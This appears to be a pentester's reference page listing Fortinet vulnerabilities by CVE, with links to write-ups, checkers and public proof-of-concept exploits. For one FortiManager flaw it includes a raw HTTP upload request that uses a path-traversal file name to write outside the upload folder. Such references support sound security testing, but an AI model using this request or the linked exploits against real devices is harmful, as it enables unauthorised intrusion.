Fortinet

FortiClient VPN

FortiClient VPN Logging Blind Spot RevealedPentera

CVE-2024-55591 - FortiOS Authentication Bypass Vulnerable

GitHub - watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591GitHub

GitHub - sysirq/fortios-auth-bypass-poc-CVE-2024-55591GitHub

GitHub - watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591GitHub

Get FortiRekt, I Am The Super_Admin Now - Fortinet FortiOS Authentication Bypass CVE-2024-55591watchTowr Labs

CVE-2024-47575 - Fortimanager - Fortijump, Unauthenticated Remote Code Execution

GitHub - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575: Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575GitHub

CVE-2024-23666 - FortiManager - Insufficient authorization checks

Fortimanager multiple vulnerabilitiesSynacktiv

CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection

GitHub - horizon3ai/CVE-2024-23108: CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command InjectionGitHub

CVE-2024-21762 - FortiGate RCE

GitHub - cleverg0d/CVE-2024-21762-Checker: This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.GitHub

GitHub - d0rb/CVE-2024-21762: The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.GitHub

Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762

CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerabilitiy

GitHub - horizon3ai/CVE-2023-48788: Fortinet FortiClient EMS SQL InjectionGitHub

CVE-2023-42791 - FortiManager - Unrestricted File Upload

Fortimanager multiple vulnerabilitiesSynacktiv

POST /flatui/api/gui/upload HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=---------------------------26433208534746453103032271192
Content-Length: 729
[...]

-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="folder"

upload
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filesize"

5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filename"

../../../../../test.txt
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="range"

0-5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filepath"; filename="system.dat"
Content-Type: application/octet-stream

test

-----------------------------26433208534746453103032271192--

CVE-2023-27997 - FortiGate SSL-VPN

GitHub - BishopFox/CVE-2023-27997-check: Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timingGitHub

CVE-2022-40684 - Fortinet FortiOS, FortiProxy, and FortiSwitchManager

GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManagerGitHub

CVE-2022-39952 - Fortinet FortiNAC

GitHub - horizon3ai/CVE-2022-39952: POC for CVE-2022-39952GitHub

CVE-2021-26088 - Improper Authentication in Fortinet Fortinet Single Sign-On

GitHub - theogobinet/CVE-2021-26088: PoC for CVE-2021-26088 written in PowerShellGitHub

CVE-2018-13379 - FortiGate SSL-VPN

GitHub - anasbousselham/fortiscan: A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool.GitHub